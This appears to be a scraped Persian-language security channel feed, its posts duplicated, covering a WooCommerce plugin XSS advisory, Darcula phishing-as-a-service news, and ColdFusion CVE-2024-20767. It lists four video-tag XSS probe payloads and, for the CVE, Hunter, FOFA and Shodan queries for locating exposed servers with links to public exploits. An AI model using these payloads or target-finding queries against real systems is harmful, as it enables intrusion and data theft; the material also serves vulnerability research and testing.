ˡⁱᵏᵉ ᶜᵒᵐᵐᵉⁿᵗ ˢᵃᵛᵉ ˢʰᵃʳᵉ
K1
kasraone
Patchstack
WordPress APIExperts Square for WooCommerce plugin <= 4.2.9 - Cross Site Scripting (XSS) vulnerability - Patchstack
Hand curated, verified and enriched vulnerability information by Patchstack security experts. Find all WordPress plugin, theme and core security issues.
🎉4👏3👍2❤1🔥1🤯1💯1
🔴 Cross-site scripting (XSS)
🔴 COD XSS SAMPEL
🔴 VIDEO
''
1- <video controls ondurationchange=alert(1)><source src=validvideo.mp4 type=video/mp4></video>
2- <video src/onerror=alert(1)>
3- <video id=x controls onfocus=alert(1)><source src="validvideo.mp4" type=video/mp4></video>
4- <video onloadeddata=alert(1)><source src="validvideo.mp4" type="video/mp4"></video>
''
نمونه های دیگر در لیست گیت های قرار میگیرد به زودی
♡ ⠀⠀ 〇⠀ ⠀ ⎙⠀ ⌲
ˡⁱᵏᵉ ᶜᵒᵐᵐᵉⁿᵗ ˢᵃᵛᵉ ˢʰᵃʳᵉ
K1
kasraone
🔴 COD XSS SAMPEL
🔴 VIDEO
''
1- <video controls ondurationchange=alert(1)><source src=validvideo.mp4 type=video/mp4></video>
2- <video src/onerror=alert(1)>
3- <video id=x controls onfocus=alert(1)><source src="validvideo.mp4" type=video/mp4></video>
4- <video onloadeddata=alert(1)><source src="validvideo.mp4" type="video/mp4"></video>
''
نمونه های دیگر در لیست گیت های قرار میگیرد به زودی
♡ ⠀⠀ 〇⠀ ⠀ ⎙⠀ ⌲
ˡⁱᵏᵉ ᶜᵒᵐᵐᵉⁿᵗ ˢᵃᵛᵉ ˢʰᵃʳᵉ
K1
kasraone
👍16👏11❤8🥰7🎉7🔥4🏆2
🔴شبکه فیشینگ دارکولا از RCS و iMessage برای فرار از تشخیص استفاده می کند
یک پلتفرم پیچیده فیشینگ به عنوان یک سرویس (PhaaS) به نام دارکولا ، سازمانهایی را در بیش از 100 کشور جهان با بهرهگیری از شبکهای عظیم از بیش از 20000 دامنه تقلبی برای کمک به مجرمان سایبری در راه اندازی حملات در مقیاس، هدف قرار داده است.
نت کرافت گفت : «استفاده از iMessage و
RCS به جای پیامک برای ارسال پیامهای متنی عواقب جانبی دور زدن فایروالهای SMS را دارد که برای هدف قرار دادن USPS همراه با خدمات پستی و سایر سازمانهای تاسیس شده در بیش از
100 کشور استفاده میشود.»
Darcula در چندین حمله فیشینگ با مشخصات
بالا در سال گذشته به کار گرفته شده است، که در آن پیامهای smishing برای کاربران اندروید و iOS در بریتانیا ارسال میشود، علاوه بر آن پیامهایی که تحویل بستهها را با جعل هویت سرویسهای قانونی مانند USPS فریب میدهند.
♡ ⠀⠀ 〇⠀ ⠀ ⎙⠀ ⌲
ˡⁱᵏᵉ ᶜᵒᵐᵐᵉⁿᵗ ˢᵃᵛᵉ ˢʰᵃʳᵉ
K1
kasraone
یک پلتفرم پیچیده فیشینگ به عنوان یک سرویس (PhaaS) به نام دارکولا ، سازمانهایی را در بیش از 100 کشور جهان با بهرهگیری از شبکهای عظیم از بیش از 20000 دامنه تقلبی برای کمک به مجرمان سایبری در راه اندازی حملات در مقیاس، هدف قرار داده است.
نت کرافت گفت : «استفاده از iMessage و
RCS به جای پیامک برای ارسال پیامهای متنی عواقب جانبی دور زدن فایروالهای SMS را دارد که برای هدف قرار دادن USPS همراه با خدمات پستی و سایر سازمانهای تاسیس شده در بیش از
100 کشور استفاده میشود.»
Darcula در چندین حمله فیشینگ با مشخصات
بالا در سال گذشته به کار گرفته شده است، که در آن پیامهای smishing برای کاربران اندروید و iOS در بریتانیا ارسال میشود، علاوه بر آن پیامهایی که تحویل بستهها را با جعل هویت سرویسهای قانونی مانند USPS فریب میدهند.
♡ ⠀⠀ 〇⠀ ⠀ ⎙⠀ ⌲
ˡⁱᵏᵉ ᶜᵒᵐᵐᵉⁿᵗ ˢᵃᵛᵉ ˢʰᵃʳᵉ
K1
kasraone
❤7🔥7👏4🎉3👍2🥰2⚡1🤯1
CVE-2024-20767 -
Arbitrary file system read using an Improper Access Control vulnerability in Adobe ColdFusion
سیستم فایل دلخواه با استفاده از یک آسیب پذیری کنترل دسترسی نامناسب
در Adobe ColdFusion
خوانده می شود
Query:
Hunter: product.name="Adobe ColdFusion"
FOFA: app="Adobe-ColdFusion"
SHODAN: http.component:"Adobe ColdFusion"
Exploit:
https://github.com/yoryio/CVE-2024-20767
https://github.com/Chocapikk/CVE-2024-20767
Blog:
https://jeva.cc/2973.html
♡ ⠀⠀ 〇⠀ ⠀ ⎙⠀ ⌲
ˡⁱᵏᵉ ᶜᵒᵐᵐᵉⁿᵗ ˢᵃᵛᵉ ˢʰᵃʳᵉ
K1
kasraone
Arbitrary file system read using an Improper Access Control vulnerability in Adobe ColdFusion
سیستم فایل دلخواه با استفاده از یک آسیب پذیری کنترل دسترسی نامناسب
در Adobe ColdFusion
خوانده می شود
Query:
Hunter: product.name="Adobe ColdFusion"
FOFA: app="Adobe-ColdFusion"
SHODAN: http.component:"Adobe ColdFusion"
Exploit:
https://github.com/yoryio/CVE-2024-20767
https://github.com/Chocapikk/CVE-2024-20767
Blog:
https://jeva.cc/2973.html
♡ ⠀⠀ 〇⠀ ⠀ ⎙⠀ ⌲
ˡⁱᵏᵉ ᶜᵒᵐᵐᵉⁿᵗ ˢᵃᵛᵉ ˢʰᵃʳᵉ
K1
kasraone
🎉5❤4⚡3🔥2🥰2👍1👏1